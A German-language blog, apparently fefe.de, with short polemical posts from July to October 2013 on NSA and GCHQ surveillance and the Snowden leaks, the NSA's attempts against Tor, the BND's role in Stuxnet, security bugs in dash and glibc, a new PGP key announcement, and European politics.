Die CDU will auch nicht offen die öffentliche Krankenversicherung abschaffen. Sie tut es lieber mit der FDP zusammen hinten herum, indem sie private Krankenversicherungen zulässt, die dann Cherry Picking betreiben und die ganzen billigen jungen Arbeiter rauszieht und die teuren Krebspatienten im öffentlichen System lässt.
Die CDU wettert auch nicht mehr offen gegen Klimaschutz. Sie hat es aber lange Jahre versucht.
Kurzum: Jedes Land hat die Republikaner, die es verdient hat. Und irgendjemand hat diesen Leuten auch noch bei der Wahl die Stimme gegeben. Oder war das alles Wahlbetrug?
[l] Wieso gibt es eigentlich im Westen keine Facebook-Revolutionen? Weil die Polizei mit Facebook einen Deal gemacht hat, dass Accounts von Protest-Aufrufern gelöscht werden.
[l] Die Amis schicken gerade eine diskrete Warnung an diverse Regierungen in aller Welt. Sie haben herausgefunden, dass dieser fiese Snowden Dokumente hat mitgehen lassen, aus denen hervorgeht, welche Geheimdienste alle so mit der NSA kooperieren. Money Quote:
In some cases, one part of the cooperating government may know about the collaboration while others — such as the foreign ministry — may not, the officials said. The documents, if disclosed, could compromise operations, officials said.
Mit anderen Worten: Die Amis machen sich jetzt Sorgen, dass die Regierungen gar nicht von ihren Handlern bei den Geheimdiensten gebrieft wurden, dass es da eine Zusammenarbeit gibt. Und befürchten jetzt, dass das peinlich werden könnte, wenn Regierungen aus der Zeitung erfahren, was ihre Vorgesetzten bei den Geheimdiensten hinter ihrem Rücken so für schattige Deals gemacht haben.
[l] Die Verlogenheit der über die NSA entrüsteten EU-Staaten wird von diesem EU-Parlaments-Bericht schön offensichtlich gemacht. Die haben mal 5 EU-Mitgliedsländer gefragt, ob die auch mit der Staubsauger-Methode rum-NSA-en, und das Ergebnis ist: 4 von 5 tun es, der 5. arbeitet dran.

Fri Oct 25 2013

[l] Die New York Times hat ein paar spannende Details augegraben. Erstens: Der BND war bei Stuxnet beteiligt.
The BND, Germany’s main intelligence agency, has pursued suspected terrorist cells and was critical to extracting information from an Iranian scientist whose computer hard drive revealed documents strongly suggesting Iran was working on the design of a nuclear warhead. It played a supporting role in trying to cripple Iran’s nuclear enrichment program, through the use of a cyberweapon.
Nur falls jemand dachte, unserer Geheimdienst ist sicher zu inkompetent, um sich irgendwo ernsthaft schuldig gemacht zu haben.
Das, was uns da gerade als No-Spy-Abkommen verkauft wird, ist in Wirklichkeit die Mitgliedschaft in Five Eyes, d.h. wir wären dann Teil des Spähnetzwerkes, das den Rest der Welt abschnorchelt.
In the past, Germany has pushed for an agreement similar to the understanding that the United States has with Britain and three other English-speaking allies that prohibits spying on one another.
Aha, die USA, England, und drei andere englischsprachige Länder, ja? Na sowas!

Thu Oct 24 2013

[l] In der Hysterie mit dem blonden Mädchen bei den Roma-Eltern in Griechenland haben auch die Behörden Irlands ein blondes Mädchen von ihren Roma-Eltern weggenommen und einen DNA-Test gemacht. Dabei kam dann peinlicherweise heraus, dass das wirkich ihre leiblichen Eltern waren und sie mussten das Kind zurückgeben. Auch einen zweijährigen Sohn hatten sie weggenommen und wieder zurückgegeben. Da kommen dann plötzlich jahrhundertealte, lange überwunden geglaubte Vorurteile gegen "die Zigeuner" wieder hoch.

Wed Oct 23 2013

[l] Was passiert eigentlich mit den ganzen Briefen, die bei der Post verlorengehen? Die werden ordnungsgemäß recycled, wie sich rausstellt. Ein Postbote hatte keinen Bock, die ganze Info-Post (adressierte Werbung) zuzustellen, und hat sie daher seinem Kumpel gegeben, einem Tischler. Der hat sie dann zum Recyclinghof gefahren und dafür ein paar Euro gekriegt. Damit sich das lohnt, hat der die immer in seiner Garage aufgehäuft, bis ein bisschen was zusammenkam. Am Ende waren es insgesamt wohl so ca 6 Tonnen Altpapier, auch Kataloge und so.

Wed Oct 16 2013

[l] Das niederländisch-russische Jahr der Freundschaft läuft nicht so gut. Es ging damit los, dass Putin die Niederlande besucht hat, und von LGBT-Protesten belästigt wurde. Der Bürgermeister von Amsterdam hatte "andere Dinge zu tun" und traf ihn nicht. Dann gab es das Greenpeace-Schiff (unter niederländischer Flagge), dass in Russland wegen Piraterie festgehalten wird. Dann hat die niederländische Polizei einen russischen Diplomat in Den Haag (Vize der russischen Botschaft) verhaftet, weil er angeblich betrunken die Kinder verprügelt hat, während seine ebenfalls betrunkene Frau vor der Tür mit dem Auto andere Autos gerammt hat. Der Außenminister der Niederlande hat sich offiziell entschuldigt, weil der Mann ja Immunität genießt, aber dann auf Facebook eine Referenz zu Piafs "Je ne regrette rien" gepostet. Und jetzt ist dem Vize der holländischen Botschaft in Moskau ins Haus eingebrochen worden und mit Lippenstift eine LGBT-Botschaft auf den Spiegel gemalt worden.
Die ersten Politiker fordern schon, die Feierlichkeiten komplett abzusagen.
Update: Ein holländischer Krawalljournalist hat mit dem Megafon den russischen Botschafter beschimpft und wurde dann verhaftet. Und anscheinend strahlt der staatliche Rundfunk in den Niederlanden gerade latent russlandfeindliche Pro-LGBT-Songs aus. (Danke, Rop)

Fri Oct 11 2013

[l] Wie schnell es mit der EU abwärts geht, sieht man ganz gut daran, dass das Rote Kreuz jetzt in England Notfall-Essensrationen verteilen will. Laut deren aktueller Statistik können sich 43 Millionen Europäer kein Essen leisten. Auch die Länder und Kommunen sind häufig damit überfordert, sich um ihre Armen zu kümmern. Ganz gruselige Zustände.wir haben uns immer über die Amerikaner lustig gemacht.

Mon Oct 7 2013

[l] Ratet mal, was das Pentagon am Abend vor dem Regierungs-Shutdown gemacht hat. Na? Kommt ihr NIE drauf!
The Pentagon pumped billions of dollars into contractors' bank accounts on the eve of the U.S. government's shutdown that saw 400,000 Defense Department employees furloughed.
Achtung: Nervige Javascript-Scheiße.

Fri Oct 4 2013

[l] Aaaah, perfektes Timing. Der Guardian leakt, wie die NSA Tor exploited. Teil 2. Teil 3.
Die gute Nachricht: Das ist alles weitgehend wie angenommen. An Tor selbst haben sie sich bisher die Zähne ausgebissen, bezeichnen es als "very secure" und bringen Sprüche wie
- We will never be able to de-anonymize all Tor users all the time.
- With manual analysis we can de-anonymize a very small fraction of Tor users, however, no success de-anonymizing a user in response to a TOPI request/on demand
Da hätte ich sie für weiter gehalten. In der Beziehung hat Frank also Recht gehabt.
Auch an Firefox haben sie sich weitgehend die Zähne ausgebissen, das hat mich auch gewundert. Firefox ist keine besonders tolle Codebasis. Da haben sie offenbar echt geknabbert, bis sie einen funktionierenden Exploit hatten. Ich habe da gerade keine Theorie zu. Das deckt sich nicht mit den Annahmen über die Fähigkeiten der NSA. Das hätte für die kein Problem sein sollen, wenn die wirklich alle verfügbaren Exploits mitnehmen.
Andere Aspekte wurden voll bestätigt, z.B. dass GCHQ Tor-Nodes betreibt.
Sie haben auch den von mir angesprochenen Weg probiert, nämlich aus ihren Packet Traces am Ziel und an möglichen Quellen die Pakete zu korrelieren. Das ist die Achillesferse von Tor, weil das ja für interaktives Webklicken gedacht ist, daher sind da keine größeren Verzögerungen zum zeitlichen Entkoppeln möglich. Aber offensichtlich reichen die kleinen Jitter schon, die Tor einbaut. Hier ist der Stand laut der Guardian-Folien:
Current: GCHQ has working version (QUICKANT). R has alpha tested NSA's version. NSA's version produced no obvious candidate selectors.
Meine früheren Überlegungen zu Tor sind hier.
Ein Highlight aus dem 2. Teil der Tor-Folien ist auch, dass sie da erstaunt schreiben, das Tor-Projekt sähe ja immer noch China und Iran als Haupt-Gegner. Um dann konsterniert festzustellen, dass die Änderungen an Tor, um dem iranischen Zensurfilter zu entgehen, auch ihre nicht sonderlich überzeugenden Detektions-Filter kaputtgemacht haben :-)

Thu Oct 3 2013

[l] Mein PGP-Schlüssel läuft demnächst aus, daher habe ich einen neuen gemacht. Der neue Schlüssel hat wieder die die PGP-ID 0xFC32CEECA534A9C6 und sieht so aus
```
pub   4096R/A534A9C6 2013-10-03
      Key fingerprint = 2DEC 3301 51BB 9F7D AD8B  0BDC FC32 CEEC A534 A9C6
uid                  Felix von Leitner <felix (at) fefe.de>
sub   4096R/530FBDF3 2013-10-03
```
Ich habe ihn mit meinen alten, noch herumfliegenden Schlüsseln signiert. Wenn ihr also einen meiner alten Schlüssel signiert oder unabhängig validiert habt, signiert bitte auch den neuen und ladet die Signatur bei den PGP-Keyservern hoch. Die Infrastruktur stinkt leider ziemlich bei PGP. Ich bitte darum, die alten Keys nicht mehr zu verwenden; die Schlüssellängen sind nicht mehr zeitgemäß.
Den Schlüssel kann man auch bei mir per https runterladen, aber wegen des schlimmen Zustands der Validierung bei X.509-Zertifikaten ist damit natürlich keine Gewähr verbunden. Möglicherweise reicht es aber dem einen oder anderen von euch trotzdem als Indiz, um dem Schlüssel zu vertrauen.
Ich werde demnächst wohl auch mal einen neuen SSL-Schlüssel mit 4096 Bit machen.
Update: Auf den Keyservern kursiert auch ein Schlüssel C18AE64E mit meinen Daten (aber ohne die Signaturen, versteht sich). Der ist nicht von mir.

Fri Sep 27 2013

[l] Ich weiß nicht, ob ihr das gesehen habt diese Tage. Der NSA-Chef hat da mal wieder aus seiner Realitätsblase heraus ein paar Ansagen gemacht. Ist der Ruf eh ruiniert, … muss er sich gedacht haben, als er ganz unverholen mit Terroranschlägen "wie in Nairobi" gewarnt hat, wenn man der NSA ihr Schnüffelprogramm kürzt.
Das mit Nairobi ist aber ein Eigentor, wenn man sich die Lage genauer anguckt. Die Amerikaner und Israel hatten nämlich dem Präsidenten von Kenia versprochen, ihn vor Anschlägen zu warnen. Mit anderen Worten: Die NSA hat genau das versprochen und nicht halten können, was sie jetzt für Amerika versprechen, als ob sie es dort halten könnten. Dass Schnüffelprogramme Terroranschläge verhindern können.
Dabei wissen wir ja schon seit dem Anschlag auf den Bostoner Marathon, dass das Bullshit ist. Aber dass der NSA-Boss da ausgerechnet Nairobi zitiert, das ist schon bizarr.

Thu Sep 19 2013

[l] GTA V hat innerhalb des ersten Tages (!) 800 Millionen Dollar eingespielt. GTA V ist das teuerste Computerspiel, das bisher gemacht wurde, mit einem Budget von 200 Millionen Dollar. Analysten haben vorher den Markt auf 20 Millionen geschätzt, die 800 Millionen stehen alleine für 13 Millionen verkaufte Kopien. Damit sind Videospiele endgültig in Regionen vorgedrungen, die sonst nur Blockbuster-Filme einspielen. Besonders spannend an dem Spiel ist, dass es erst ab 17 verkauft werden darf in den USA. Und traditionell galt bei Kinofilmen und Computerspielen das M-Rating immer als Kassengift. Die Leute haben sich da immer in letzter Minute noch in den Fuß geschossen und anstößige Szenen rausgeschnitten, damit sie bloß kein M-Rating kriegen und eine größere Zielgruppe erreichen. Vielleicht hat jetzt jemand gemerkt, dass man mehr Geld machen kann, wenn man sich an Erwachsene richtet mit seinen Computerspielen, weil die die mit dem Geld sind.

Sun Sep 8 2013

[l] In Wien hat ein Nerd ein Foto der NSA-Schnüffelzentrale gemacht und seine Diskussion mit einem sofort herbeieilenden Polizisten protokolliert. Ganz großes Kino!
Er gibt mir keine Daten her. Er muss mir die Daten geben. Geh’ hol mir einen Funkwagen her bitte. Mein Handy ist leer, und das Funkgerät ist auch vor zwei Minuten leer geworden.

Fri Sep 6 2013

[l] Wieso stand bei den aktuellen Kryptokalypse-Artikeln eigentlich so wenig an technischen Details drin? Weil die Geheimdienste Druck gemacht haben. Das steht auch in dem bereits von mir verlinkten Artikel drin, aber ich dachte mir, ich weise da nochmal explizit drauf hin. Denn das ist in meinen Augen ein absoluter Skandal, dass diese Leute diesen Einfluss auf die Presse nehmen. Nicht nur dass sie es versuchen, dass sie es können! Unglaublich.

Wed Sep 4 2013

[l] Auflösung zu der Raketensichtung: Israel sagt, sie hätten mit den Amis zusammen einen Raketentest im Mittelmeer gemacht. (Danke, Jascha)

Thu Aug 29 2013

[l] Ich habe mich vorhin mit einem Typen unterhalten, der mir eine lustige Geschichte erzählt hat. Es ging um die Frage, ob man Marktregulierung braucht. Ich finde ja, und brachte die Goldman-Sachs-Aluminium-Hin-und-Her-Fahrerei als Argument. Sein Argument war, dass es immer in die Hose geht, wenn der Staat eingreift. Er illustrierte das mit einer Geschichte, die ich hier mal wiedergeben möchte.
Es geht damit los, dass in den USA 10% Ethanol im Benzin sind. Das ist gesetzlich vorgeschrieben. Das Gesetz sieht auch vor, dass die Menge an Ethanol über die Jahre hochgeht, die die Tankstellenindustrie abnehmen muss. Nun haben die Amerikaner, wenn es um Ethanolgewinnung geht, seit Jahren Mais als Ausgangsmaterial genommen. Es stellt sich aber raus, dass das überhaupt nicht umweltfreundlich ist, aus Mais Ethanol zu gewinnen, weil man da mehr Energie aufwendet, als man wieder rauskriegt. Also haben sie rumgeguckt und haben gesehen, dass man auch aus Cellulose Ethanol machen kann, und da ist die Bilanz viel besser. Leider ist dafür die Infrastruktur nicht da, um das in Mengen zu gewinnen, wie das Gesetz es vorschreibt. Also haben sie weiter geguckt und gesehen, dass Brasilien Ethanol aus Zuckerrohr via Cellulose gewinnt. Aber die gewinnen nur so viel, wie sie selber brauchen. Die Amis kaufen den Brasilianern also den Markt leer, und die Brasilianer importieren dann für ihren Eigenbedarf das Ethanol aus … den USA, das aus Mais gemacht wird. Wir sind also so weit wie vorher, nur dass noch die Transport-Kosten drauf kommen, monetär und für die Umwelt. m(

Wed Aug 28 2013

[l] Die Süddeutsche hat mal eine schöne Umfrage unter Abgeordneten gemacht. Sie mussten sich echt anstrengen, um überhaupt Antworten zu kriegen, und haben es nach Fehlschlägen, Tricks und Optimierungen nur auf eine Antwort-Quote von 25% geschafft. Das zeigt, was für desinteressierte Armleuchter da zur Wahl stehen. Die zu bewertenden Aussagen haben es inhaltlich in sich. Besonders gut gefallen hat mir die Frage "Wer seinen Freunden Geld leiht, darf keine Zinsen nehmen". Aber auch ansonsten ist da alles wichtige drin. Einige Fragen sind kritikwürdig, z.B. "Deutschland braucht einen völlig neuen Verfassungsschutz". Da hätte ich weder ja noch nein antworten können, denn was Deutschland braucht, ist dass der Verfassungsschutz zugemacht wird. Oder "Ein Einsatz wie der in Afghanistan ist der Bundeswehr nicht mehr zuzumuten". Das ist doch überhaupt nicht die Frage an der Stelle! Aber hey. Von Drohnenkrieg über Massen-DNA-Tests bis hin zu Atommüll und Nebentätigkeiten von Politikern ist alles dabei. Die Rohdaten hat die Süddeutsche leider in Prä-Snowden-Manier ausgerechnet bei Google Docs abgelegt m(

Thu Aug 22 2013

[l] Bug des Tages: Debians /bin/sh droppt keine Privilegien, wenn es von einem setuid aufgerufen wird. Bash tut es, das benutzen praktisch alle anderen Linux-Distributionen. Die, die nicht Bash benutzen, benutzen pdksh, das tut das auch. Aber Debian benutzt dash. Für dash gibt es auch einen Patch. Aber Debian spielt ihn nicht ein. Weil, festhalten: das offenbar UUCP kaputtgemacht hat.
Money Quote:
P.S. If you don't know what uucp is, you can read more about it on fidonet or at my gopher site.
Muhahahahaha

Wed Aug 21 2013

[l] Kurzes Vatikan-Update: Ratzinger trat zurück, weil Gott es ihm in einer mystischen Erfahrung gesagt hat.
OK, Leute, das ist jetzt lang genug her. Wer von euch war das? Und was habt ihr gemacht? So hier? Oder eher so?

Thu Aug 15 2013

[l] Wired hat mal wieder eine Story über ein bizarres Projekt aus dem kalten Krieg. Die Amis haben damals Kupferfäden im Orbit verteilt, damit die eine Antenne bilden. Für den Fall, dass die Sowjets ihre Unterseekabel kaputtgemacht hätten.

Mon Aug 12 2013

[l] Ronald "Milton Waddams" Pofalla hat einen Plan für das NSA-Problem: Ein "no-spy"-Abkommen. Mit den Amerikanern.
Nein, wirklich! Was steht da genau drin? Was haben denn die Amerikaner bisher gemacht, was das Abkommen in Zukunft verhindern soll? Das ist alles geheim, Pofalla ließ keine Fragen zu.
Mir fällt gar keine gute Analogie ein, um zu verdeutlichen, was für eine Verarschung das ist. Die tun nicht mal so, als würden sie uns irgendwas konkretes vorschlagen. Das einzige konkrete ist, dass es "Gespräche" geben wird, und zwar im September. Die werden sich dann hinziehen bis nach den Wahlen. Leider wird es bis zu den Wahlen noch keine Ergebnisse geben, und danach ist das ja eh nicht mehr so wichtig. Hauptsache das System Merkel bleibt an der Macht.

Fri Aug 9 2013

[l] OH DIESE PIRATEN!!! Da hatte da EINMAL jemand was berichtenswertes gemacht, und jetzt das: Ermittlungen gegen "Geben Sie mal Ihr Handy her"-Zivilpolizisten eingestellt. Weil — festhalten — er keine PIN-Eingabe überwinden musste. Daher waren die Daten nicht besonders gesichert und deshalb war das keine strafbare Handlung.
Der hat also nicht nur freiwillig sein Handy übergeben, der hat es auch vorher nicht ausgemacht, so dass der Polizist da frei rumklicken konnte. Oder war da etwa gar keine PIN gesetzt? Dafür reicht im Moment meine Vorstellungskraft nicht. So blöde kann doch keiner sein.

Thu Aug 8 2013

[l] Sagt euch Lavabit was? Das ist ein US-Freemail-Service. Der ist vor ein paar Jahren von einem Typen gegründet worden, der mit der Privatsphäre bei Google Mail nicht zufrieden war. Ich habe mir das nie näher angesehen, weil der ja immer noch in den USA ansässig war und damit US-Gesetzen unterliegt. Damit kann der die besten Intentionen haben, er ist immer noch anfällig für National Security Letters und co.
Neulich kam dann raus, Dass Snowden seine Email über Lavabit gemacht hat. Uiuiui, das ist ein starker Test für einen Email-Provider. Man würde denken, dass da direkt die US-Behörden mit dem großen Hammer aufschlagen und einmal alles raustragen wollen. Und in der Tat: Lavabit macht unter mysteriösen Umständen zu, und warnt ausdrücklich davor, seine Email bei einem Anbieter in den USA abzulegen:
This experience has taught me one very important lesson: without congressional action or a strong judicial precedent, I would _strongly_ recommend against anyone trusting their private data to a company with physical ties to the United States.
Nehmt das, ihr ganzen Apologeten. Das sagen wir Aluhut-Paranoiker seit vielen Jahren!1!!

Mon Aug 5 2013

[l] Wisst ihr, was wir jetzt brauchen? Mehr alte Abgeordnete im Bundestag. Ihr wisst schon, so Leute wie Schäuble. Deren Leben im Wesentlichen vorbei ist, die nichts mehr zu befürchten haben, nicht mehr langfristig denken müssen, immer nur kurzfristig auf ihren eigenen Vorteil bedacht sind. Solche Leute.
Es gab da mal eine Studie, bei der sie alte Menschen gefragt haben, ob man Schulen fördern soll. Alte Menschen mit Kindern und Enkeln haben signifikant häufiger für ja gestimmt. Politik wird immer für zukünftige Generationen gemacht. Schlimm genug, dass wir denen gerade alles kaputt machen. Noch schlimmer, wenn wir sie dafür aus dem Parlament ausladen, damit wir mehr alte Säcke drinhaben können.
Oh, dieser Vorschlag kam übrigens von Schäuble.

Fri Aug 2 2013

[l] Bei den Hausaufgaben eine Berechnung falsch gemacht? Kein Problem! "Der Xerox-Fotokopierer hat die Zahlen verändert!"
Haltet ihr für unglaubwürdig? Guckt euch die Beispiel-Bilder an! (Danke, Andreas)
[l] Ein schöner Realitätsabgleich zur Mächtigkeit der Verbindungsdaten-Analyse ist dieses Post-Mortem der in Italien aufgedeckten CIA-Operation. Und die CIA-Agenten da sind Profis, die Wegwerf-Handys benutzt haben. Zwei Monate vor der Operation erstmals angeschaltet, zwei Tage danach zuletzt angeschaltet. Trotzdem konnten die identifiziert werden, u.a. natürlich auch weil Fehler gemacht wurden. Aber der Punkt an der Stelle ist: Wenn sich nicht mal so sorgfältig operierende CIA-Agenten vor Verkehrsdatenanalyse sichern können, dann wollen wir das keinesfalls gegen die gesamte Bevölkerung angewendet sehen.

Thu Aug 1 2013

[l] Die FAZ munkelt, die NSA habe ihre Ausreden aus abgeschnorchelten Mails von Friedrich kopiert. Ich weiß das, weil ich diesen Satz geschrieben habe :-) Die FAZ hat mich nämlich gestern abend kurzfristig zur Blackhat geflogen, damit ich mir heute morgen die Keynote von dem NSA-Chef angucken kann, und ihnen da einen kurzen Bericht zu schreiben kann.
Ich hatte mich im Vorfeld ein bisschen gewundert, dass die überhaupt die NSA die Keynote machen lassen. Die NSA ist ja zumindest international gerade ziemlich der Buhmann. Da hätte es sicherlich unkontroversere Kandidaten gegeben.
Man könnte auch vermuten, dass die die NSA da reden lassen, um Kontroverse und damit Presseinteresse für ihre Veranstaltung zu generieren. Aber das war es nicht, denn sie haben keine Zuschauerfragen zugelassen. Das wäre wohl auch ziemlich nach hinten losgegangen. Ich für meinen Teil hätte da jedenfalls gerne eine Frage gestellt.
Ich hatte mir da als Kandidaten überlegt:
1. Ich habe von Deutschland aus eine Email an die NSA geschickt. Die ging durch Großbritannien und wurde vom GCHQ abgefangen und gelesen. Die Briten lesen also Ihre Email. Stört Sie das?
2. Die Deutschen sind besorgt, dass die NSA ihre Emails liest. Ihre Ansagen, dass das ja (von einem Geheimgericht) juristisch überprüft wird, und im Übrigen nur auf Nicht-Amerikaner zielt, ist ihnen kein großer Trost. Was können Sie den Deutschen sagen, um ihre Sorgen zu lindern?
Wenn er öffentlich angesagt hätte, dass das schon OK ist, wenn die Briten seine Mail lesen, das wäre echt ein Höhepunkt gewesen.
Ich teile da die Einschätzung der US-Journalisten, mit denen ich mich unterhalten habe, die meinten, das hätte die NSA wohl nach den Snowden-Leaks am liebsten abgesagt, aber das hätte noch schlechter ausgesehen. Und so haben sie gute Miene zum schlechten Spiel gemacht und es mit Vorwärtsverteidigung versucht. Das ging allerdings ziemlich nach hinten los. Es gab das übliche Programm, was ich mal als die US-Version der Ziercke-Tournee bezeichnen will. Internetzensur begründet man mit Kinderpornographie, Abschnorcheln begründet man mit den Terroristen. Und so war jedes zweite Wort "Terrorist" in der Keynote. Die seien halt unter uns und da müsse ja jemand was tun. Ob er sich als Befehlsempfänger sieht oder als Akteur kam nicht wirklich rüber, weil er jedes Indiz auszuräumen versuchte, dass das in irgendeiner Art und Weise moralisch verwerflich sei, was die NSA da tut. Alles total harmlos! Wir haben da nur ein paar Telefonnummern und verknüpfen die, und damit geben wir dann wertvolle Hinweise an das FBI, und die laufen dann mit National Security Letters los, finden die Namen der Verdächtigen, haben dank unserer Daten "probable cause" und schicken dann einen Richter los. Man könnte es fast zusammenfassen als: Wenn hier einer zu viel Macht hat, dann das FBI!1!!
Das fiel ihm wohl auch selber auf, daher schloss sich eine Hollywood-mäßige Lobeshymne an. Das FBI sei eine großartige Behörde, und ihr Leiter Robert Mueller, das ist ja der tollste Mann, den er je kennengelernt hat. Das war echt wie eines dieser schmierigen Making-Of-Trailer aus Hollywood. Es sei ein Privileg und eine Ehre, mit allen diesen tollen Menschen zusammenzuarbeiten. Alle Mitarbeiter seien selbstlose, ehrenwerte Menschen, die Amerika zu einem besseren Ort machen wollen!
Oh und er habe ja gehört, dass die FISA Courts Rubber Stamps verteilen, d.h. alles einfach durchwinken. Nichts könnte ferner von der Wahrheit sein! Das sind alles knochenharte Karrierejuristen, die lassen sich von niemandem über den Tisch ziehen! Selbst er als Vier-Sterne-General habe sich da schon Rüffel abholen müssen!1!!
Ihr seht schon, das war Hollywood pur. Eine PR-Veranstaltung vom Feinsten. Bis dann, nach ca einer halben Stunde, von hinten eine einzelne Stimme "BULLSHIT!" brüllte. Andy Greenberg von Forbes hat den Typen ausfindig gemacht. Das war echt Popcorn-Kino, weil der NSA-Chef da schon drauf antworten wollte, aber nicht Bullshit sagen wollte. Er sei ja 14facher Großvater und müsse auf seinen Duktus achten. Greenberg hat den ganzen Dialog aus seiner Aufnahme transkribiert.
Zu meiner Überraschung kriegte der Herr General dann sogar noch zwei kurze Runden Applaus für seine Patrioten-Hollywood-Tränendrüsen-Aussagen, und konnte sogar öffentlich dazu aufrufen, die Hacker seien doch die Leute, die das alles verstehen, und wir sollten ihnen doch mal helfen, der Welt da draußen zu erklären, dass die NSA voll die Guten sind. Und im Übrigen sollen wir mithelfen. Gerade wenn wir nicht damit einverstanden sind, was die NSA so treibt. Gerade dann. Doppelt wichtig sei das dann, dass wir mithelfen. An der Stelle wirkte das ganze ein bisschen wie ein Steve Jobs Moment auf mich. Das Realitätsverzerrungsfeld sorgte für einen leichten Schwindelanfall.
Überhaupt, dass der Mann sich da auf die Bühne stellt und was von Transparenz, Offenheit und Fakten auf den Tisch faselt, während die Fakten ja gar nicht er auf den Tisch gelegt hat, sondern der Snowden, das war schon echt ein Dali-Moment.
Unter den Hackern, mit denen ich mich so unterhalten habe, war die Sache völlig klar. Kein einziger war da auf Seiten der NSA. Da aber in den USA die Hälfte der Hacker ihr Gehalt direkt oder indirekt in Abhängigkeit von der Regierung bezieht, sagen da aber nur wenige offen ihre Meinung.
Wir haben da in Europa echt etwas gutes aufgebaut. Unsere Hacker-Szene ist mir deutlich sympathischer.
Update: Den einen tollen Spruch hatte ich noch gar nicht erwähnt. An einer Stelle war er sichtlich erzürnt, dass die Leute bei solchen Angelegenheiten der Presse glauben. Und nicht "den Fakten", womit er wohl seinen Behauptungen-Katalog meinte. Auch sehr auffällig war, dass die Folien sich sehr deutlich von dem Powerpoint-Fegefeuer abhoben, die Snowden da geleakt hatte. Das war ihnen offensichtlich ein echtes Anliegen, da nicht wie blutige Anfänger zu wirken :-)
Update: Oh und falls das nicht klar war: Die Idee, dass jemand schon gegen die Datensammlung an sich sein könnte, und nicht bloß Sorgen hat, dass das missbraucht werden könnte, die ist völlig außerhalb der Vorstellungskraft der NSA. Die gesamte Verteidigung ging davon aus: Wir haben diese Daten, und vertraut uns doch einfach, dass wir damit keinen Mist machen.

Tue Jul 30 2013

[l] Fnord des Tages: Apples Dokumentation über AFP (nach FPSpotlightRPC gucken).
This command (command code 76) is a private command used by Spotlight searching on the AFP server. This command is not documented.
Ja super, Apple! Das habt ihr aber fein gemacht! Da hat ja jemand VOLL verstanden, was der Sinn von Dokumentation ist!1!!

Thu Jul 25 2013

[l] JP Morgan findet, die Verfassungen in Europa sind alles unzeitgemäße linksradikale Kommunistendokumente und müssen mal dringend neugemacht werden. Die haben da so kommunistische Elemente wie Gewaltenteilung drin, wo am Ende das Parlament mehr Macht hat als die Exekutive. Das geht ja mal GAR nicht!
it’s the first public document I’ve come across where the authors are frank that the problem is not just a question of fiscal rectitude and boosting competitiveness, but that there is also an excess of democracy in some European countries that needs to be trimmed
Die Demokratie ist der kapitalistischen Ausbeutung der Bevölkerung doch bloß im Wege. (via) (Danke, Ani)

Tue Jul 23 2013

[l] Hahaha, was für ein schönes Beispiel für die Doppelzüngigkeit und Lügnerei in der Politik. Die Briten wollen zum Jahresende Pornos aus dem Internet wegfiltern. Wer doch Pornos sehen will, muss bei seinem Internet-Provider ein Opt-In beantragen. Und was ist mit den Tittenbildern auf Seite 3, von der Sun berühmt gemacht? DAS ist was VÖLLIG anderes!1!!
David Cameron has said he would never support a ban on topless images on page 3 of the Sun newspaper
Weil Camerons Zielgruppenanalyse der Wählerschaft offensichtlich ergeben hat, dass Cameron-Wähler kein Internet benutzen, sondern sich ihre Tittenbilder am Kiosk aus der Sun holen.

Tue Jul 16 2013

[l] Bug des Tages: Der XOR-Wert für die "Pointer-Verschlüsselung" in glibc ist 0, wenn man statisch linkt. Ein Ulrich Drepper aus dem Bilderbuch. Drepper findet ja schon seit 10 Jahren, dass statisch linken obsolet ist und nicht mehr supported gehört. Aber dass er bei dem nicht supporten so handgreiflich wird, das hätte ich jetzt auch wieder nicht gedacht :-)
Bei dieser Pointer-Verschlüsselung handelt es sich um eine Buffer Overflow Mitigation, also eine Maßnahme, die im Falle von Buffer Overflows die Ausnutzung erschweren soll. Die traditionalle Methode sind Stack Canaries, das sind "zufällige" Werte auf dem Stack. Und bevor man potentiell im Rahmen eines Buffer Overflows überschriebene Werte übernimmt, prüft man, ob der Kanarienvogel noch lebt, wie damals in den Minen. In der glibc wurde ein anderer Weg gewählt, nämlich dass die Pointer "verschlüsselt" werden. Dafür wird statt des tatsächlichen Wertes ein XOR mit einem "zufälligen" Wert und eine Rotation gemacht. Die Idee ist, dass der Angreifer das dann zwar überschrieben kann, aber da er den XOR-Wert nicht kennt, kann er nicht wissen, welchen Wert er da hinschreiben muss. Und der Wert ändert sich mit jedem Programmaufruf. Außer halt wenn man glibc nimmt und statisch linkt.

Mon Jul 15 2013

[l] Erinnert ihr euch an Dick Cheney? Bushs Lebensversicherung? Wenn Bush einem Attentat zum Opfer gefallen wäre, hätte Cheney als Präsident weitergemacht. DER Cheney. Der Untote, ohne Pulsschlag.
Der hat sich neulich hingestellt und die NSA-Schnüffelprogramme mit der Aussage zu verteidigen versucht, dass man mit solchen Programmen ja 9/11 hätte verhindern können.
Toller Talking Point, Herr Cheney! Zumindest bis jemandem auffällt, dass die NSA-Schnüffelprogramme zum Zeitpunkt von 9/11 schon 7 Monate liefen. Hups!
Und man darf natürlich auch nicht vergessen, dass die NSA schon seit Jahrzehnten alle Ausländer komplett abhört, an die sie rankommt, Stichwort Echelon. Und die 9/11-Attentäter waren ja alles Ausländer.
Update: Oh, Cheney hat inzwischen wieder einen Puls. Das hatte ich gar nicht mitgekriegt.

Fri Jul 12 2013

[l] Kurzes PSA: Das ZDF hat heute abend eine Talkshow über die NSA gemacht, in der u.a. Jake Appelbaum zu Gast war, ein Amerikaner. Der hat natürlich Englisch gesprochen und wurde übersetzt. Der sprach dann da Dinge an wie das OSZE-Verfahren gegen die GEMA. Keiner sagte was. Ich dachte mir so: Huh? GEMA? OSZE? Naja, wird schon seine Richtigkeit haben. Und das werden sich auch alle anderen Zuschauer gedacht haben, denn keiner sagte was. Jetzt fällt mir gerade auf, dass der nicht die GEMA sondern Gamma meint, wegen deren Trojanerlieferungen an lupenreine Demokraturen. Da gab es wohl wirklich was auf OSZE-Ebene. Aber ich finde es ausgesprochen amüsant, dass keiner der anderen Gäste oder der Übersetzer was sagte. Bei keinem hat die Idee, dass die GEMA mal von der OSZE zugemacht werden müsste, genug Spannung im Weltbild erzeugt, um eine Reaktion zu provozieren. BWAHAHAHAHA
Daher: Im Übrigen bin ich dafür, dass die OSZE die GEMA zumacht.
Die Sendung war übrigens teilweise durchaus unterhaltsam. Popcorn bereithalten. Jake fragt z.B. den Schmidbauer, ob der BND eigentlich auch Leute abschnüffelt mit Trojanern und so. Daraufhin andere in der Runde "natürlich nicht" und der Schmidbauer dann "natürlich!" Die Szene ist echt großartig.

Wed Jul 10 2013

